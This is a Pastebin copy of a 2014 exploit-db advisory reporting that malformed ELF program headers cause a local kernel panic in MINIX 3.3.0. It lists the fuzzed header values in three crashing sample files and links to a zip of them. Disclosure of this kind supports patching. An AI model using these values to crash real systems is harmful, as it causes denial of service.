Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title MINIX 3.3.0 Local Denial of Service PoC
- Date add 2014-11-07
- Category dos / poc
- Platform linux
- Risk [<font color="#FFFF00">Security Risk Medium</font>]
- =====================================================
- # Exploit Title: MINIX 3.3.0 Local Denial of Service
- # Exploit Author: nitr0us
- # Vendor Homepage: www.minix3.org
- # Software Link: http://www.minix3.org/download/index.html
- # Version: 3.3.0
- # Tested on: MINIX 3.3.0 x86
- Attached three PoCs (malformed ELFs) and a screenshot of the panic.
- http://www.exploit-db.com/sploits/35173.zip
- ----
- MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
- Attached three PoCs that panicked the OS, and their modified fields:
- =================================================================================
- [+] Malformed ELF: 'orc_0064':
- [+] Fuzzing the Program Header Table with 4 entries
- (PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03]
- executed
- (PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
- (PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
- (PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
- (PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03]
- executed
- (PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
- (PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed
- =================================================================================
- [+] Malformed ELF: 'orc_0090':
- [+] Fuzzing the Program Header Table with 4 entries
- (PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
- (PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed
- =================================================================================
- [+] Malformed ELF: 'orc_0092':
- [+] Fuzzing the Program Header Table with 4 entries
- (PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04]
- executed
- (PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]
- =================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement